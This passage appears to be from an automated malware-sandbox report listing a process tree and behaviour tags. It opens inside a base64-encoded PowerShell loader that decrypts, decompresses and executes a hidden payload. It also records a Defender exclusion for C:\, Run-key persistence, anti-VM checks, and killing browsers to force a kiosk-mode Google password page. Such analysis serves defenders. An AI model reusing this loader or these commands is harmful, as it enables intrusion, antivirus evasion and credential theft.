HhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5448 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4884 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
PID:3888
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369650101\ae9ccc196b.exe"C:\Users\Admin\AppData\Local\Temp\10369650101\ae9ccc196b.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5556 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369670101\ce59d98f05.exe"C:\Users\Admin\AppData\Local\Temp\10369670101\ce59d98f05.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:7612
-
-
C:\Users\Admin\AppData\Local\Temp\10369680101\5796d75ec2.exe"C:\Users\Admin\AppData\Local\Temp\10369680101\5796d75ec2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:9808
-
-
C:\Users\Admin\AppData\Local\Temp\10369690101\751a73f7f3.exe"C:\Users\Admin\AppData\Local\Temp\10369690101\751a73f7f3.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:12088 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:12552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
PID:4924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:9464
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵PID:9404
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {01b2fb25-772c-4797-a3fc-95b85b37976a} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:8460
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2508 -initialChannelId {25af4e45-98ff-4400-8770-9c32af50c007} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:2132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3848 -prefsLen 25213 -prefMapHandle 3852 -prefMapSize 270279 -jsInitHandle 3856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3864 -initialChannelId {28117bea-570c-494e-b695-744e18678681} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵PID:7832
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4020 -prefsLen 27325 -prefMapHandle 4024 -prefMapSize 270279 -ipcHandle 4100 -initialChannelId {7de9eeec-db3b-42b5-a11e-00e89159ef41} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:7772
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4324 -prefsLen 34824 -prefMapHandle 4328 -prefMapSize 270279 -jsInitHandle 4332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4340 -initialChannelId {87f64fa3-958f-4bec-aea4-47cba5cf028f} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵PID:7180
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4852 -prefsLen 34905 -prefMapHandle 4856 -prefMapSize 270279 -ipcHandle 4016 -initialChannelId {914816c7-c381-4628-a1d8-980c3cd74a8a} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵PID:9700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3304 -prefsLen 32845 -prefMapHandle 5096 -prefMapSize 270279 -jsInitHandle 5124 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5132 -initialChannelId {30dae4b6-d4ee-422c-aed0-d590e079759a} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵PID:10316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5380 -prefsLen 32845 -prefMapHandle 5384 -prefMapSize 270279 -jsInitHandle 5388 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4848 -initialChannelId {097ac4ac-7d2c-4e85-9b1a-bd3b99286e31} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵PID:10400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32845 -prefMapHandle 5576 -prefMapSize 270279 -jsInitHandle 5580 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5588 -initialChannelId {355cb1df-ce99-4de1-ae3d-099232aa7a7e} -parentPid 9404 -crashReporter "\\.\pipe\gecko-crash-server-pipe.9404" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵PID:10404
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369700101\2c08ea48de.exe"C:\Users\Admin\AppData\Local\Temp\10369700101\2c08ea48de.exe"6⤵PID:9040
-
-
C:\Users\Admin\AppData\Local\Temp\10369710101\60ab896418.exe"C:\Users\Admin\AppData\Local\Temp\10369710101\60ab896418.exe"6⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369710101\60ab896418.exe"7⤵PID:7080
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369720101\40608a0434.exe"C:\Users\Admin\AppData\Local\Temp\10369720101\40608a0434.exe"6⤵PID:6928
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10369720101\40608a0434.exe"7⤵PID:11144
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:3640
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:624
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2556
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:12852
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:12912
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:12988
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:13032
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:13072
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:13116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:13196
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:13240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:13292
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:6264
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:6472
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6524
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:6672
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6760
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:6864
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:7176
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:7392
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7628
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:8064
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6104
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:1336
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8204
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:8320
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8484
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:8672
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:8860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:8976
-
C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exeC:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\8fe1ZIHI3C10.exe1⤵PID:9156
-
